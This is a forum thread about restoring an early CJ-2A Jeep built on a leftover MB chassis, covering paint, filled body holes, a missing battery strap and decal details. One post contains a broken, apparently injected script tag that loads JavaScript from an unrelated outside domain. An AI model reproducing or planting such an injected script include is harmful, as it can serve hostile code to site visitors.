The paint for the body was a custom mix of PPG  DCC single stage. The frame paint is Eastwoods ceramic chassie black.

Great looking restoration. I hope to have mine heading in that direction at some point.

A quick question: I didn't see any holes drilled on the rear panels for the taillight and the reflector. Will those come when the small parts are assembled on the vehicle?

Sincerely,

John

Actually I have 'semi' retired and moved to our shore house on the Chesapeake in Norfolk.  Army Jeep Parts of course is in PA (Tullytown).

Yep, there were so many holes drilled in the original body that it was a massive job filling them all in, and these got swept up in the crusade.  So we'll have to drill them out again!

Thanks for your response. The work looks great and it’s an inspiration to me. My ‘45 was also pasture green and my goal is to bring it back to original just as you’ve done.

Thanks for sharing updates with the group!

My pleasure.  I have worked with George Baxter at AJP across ~25 years and he does incredible work and is very knowledgeable.  He supervised the team at Shaffer & Long who will also do final assembly and details.

We were fortunate to find some very good paint inside the tool box, which was part of the benefit of a car that likely spent its whole life in the desert.

In a perfect world, I would've preferred to lavish all this attention on a VEC '45 2A, but when I discovered this 2A was one of the 29,XXX series Jeeps that used the leftover MB chassis, I thought that was a unique enough angle to deserve the full treatment.
Your car of course will also have many MB features.

to everyone following this thread:  I could use your help.  I just posted a list of detail questions over on the 'Reference' Sub forum, would love any opinions on the myriad details around final assembly and finishes...< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">

She really looks great and you have taken great attention to detail so I have to ask, did you on purpose leave the battery hold down strap off?

No; we replaced what was there, but possibly it is incorrect?  Can you link me to a correct hold down strap?

Come to think of it, please let me know of any other missing details you notice.  Also: I believe these very early 2As did not have decals either on the air filter or the oil filter.  If I am mistaken, I'd love to know.
